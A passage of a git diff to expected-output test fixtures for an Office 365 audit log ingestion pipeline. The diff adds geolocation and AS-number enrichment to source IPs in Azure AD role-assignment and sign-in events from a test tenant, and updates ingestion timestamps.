\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"
\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18631,6 +19807,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -18793,7 +19981,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125407700Z", + "ingested": "2021-12-14T14:48:43.176745856Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"
Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"
\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json index 43ffb7d9847..bc4b62e5e20 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -82,7 +94,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970069Z", + "ingested": "2021-12-14T14:49:08.047393882Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -122,6 +134,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -202,7 +226,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970080Z", + "ingested": "2021-12-14T14:49:08.047396789Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -242,6 +266,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -322,7 +358,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970086Z", + "ingested": "2021-12-14T14:49:08.047397351Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -362,6 +398,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -442,7 +490,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970091700Z", + "ingested": "2021-12-14T14:49:08.047397954Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -482,6 +530,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -562,7 +622,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970097400Z", + "ingested": "2021-12-14T14:49:08.047398722Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -602,6 +662,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -682,7 +754,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970103200Z", + "ingested": "2021-12-14T14:49:08.047399334Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -722,6 +794,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -802,7 +886,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970108800Z", + "ingested": "2021-12-14T14:49:08.047399928Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -842,6 +926,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -922,7 +1018,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970114500Z", + "ingested": "2021-12-14T14:49:08.047400460Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
